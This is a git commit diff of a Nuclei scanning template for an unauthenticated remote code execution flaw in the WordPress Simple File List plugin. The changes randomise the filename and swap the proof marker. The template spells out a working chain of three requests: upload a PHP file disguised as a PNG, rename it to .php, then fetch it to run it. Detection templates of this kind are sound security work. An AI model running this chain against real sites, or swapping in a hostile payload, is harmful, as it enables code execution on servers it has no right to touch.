Update wordpress-rce-simplefilelist.yaml
parent
56d575f41e
commit
12862393b6
|
@ -12,9 +12,12 @@ info:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||||
cvss-score: 10.0
|
cvss-score: 10.0
|
||||||
cwe-id: CWE-77
|
cwe-id: CWE-77
|
||||||
tags: wpscan,wordpress,wp-plugin,rce,intrusive,fileupload,python
|
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
max-request: 3
|
||||||
|
tags: wpscan,wordpress,wp-plugin,rce,intrusive,fileupload,python
|
||||||
|
|
||||||
|
variables:
|
||||||
|
filepath: '{{rand_base(7, "abcdefghi")}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -41,10 +44,10 @@ http:
|
||||||
|
|
||||||
ba288252629a5399759b6fde1e205bc2
|
ba288252629a5399759b6fde1e205bc2
|
||||||
--6985fa39c0698d07f6d418b37388e1b2
|
--6985fa39c0698d07f6d418b37388e1b2
|
||||||
Content-Disposition: form-data; name="file"; filename="nuclei.png"
|
Content-Disposition: form-data; name="file"; filename="{{filepath}}.png"
|
||||||
Content-Type: image/png
|
Content-Type: image/png
|
||||||
|
|
||||||
<?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
|
<?php echo md5("wordpress-rce-simplefilelist"); phpinfo(); ?>
|
||||||
--6985fa39c0698d07f6d418b37388e1b2--
|
--6985fa39c0698d07f6d418b37388e1b2--
|
||||||
|
|
||||||
- |
|
- |
|
||||||
|
@ -54,28 +57,22 @@ http:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
|
eeSFL_ID=1&eeFileOld={{filepath}}.png&eeListFolder=%2F&eeFileAction=Rename%7C{{filepath}}.php
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
|
GET /wp-content/uploads/simple-file-list/{{filepath}}.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)'
|
- "aa5be3e9dec96f2f1a593b2f5b2288af"
|
||||||
- "PHP Version"
|
- "PHP Version"
|
||||||
- "Configuration Command"
|
- "Configuration Command"
|
||||||
part: body
|
|
||||||
condition: and
|
condition: and
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- 'text/html'
|
|
||||||
part: header
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/31
|
|
||||||
|
|
Loading…
Reference in New Issue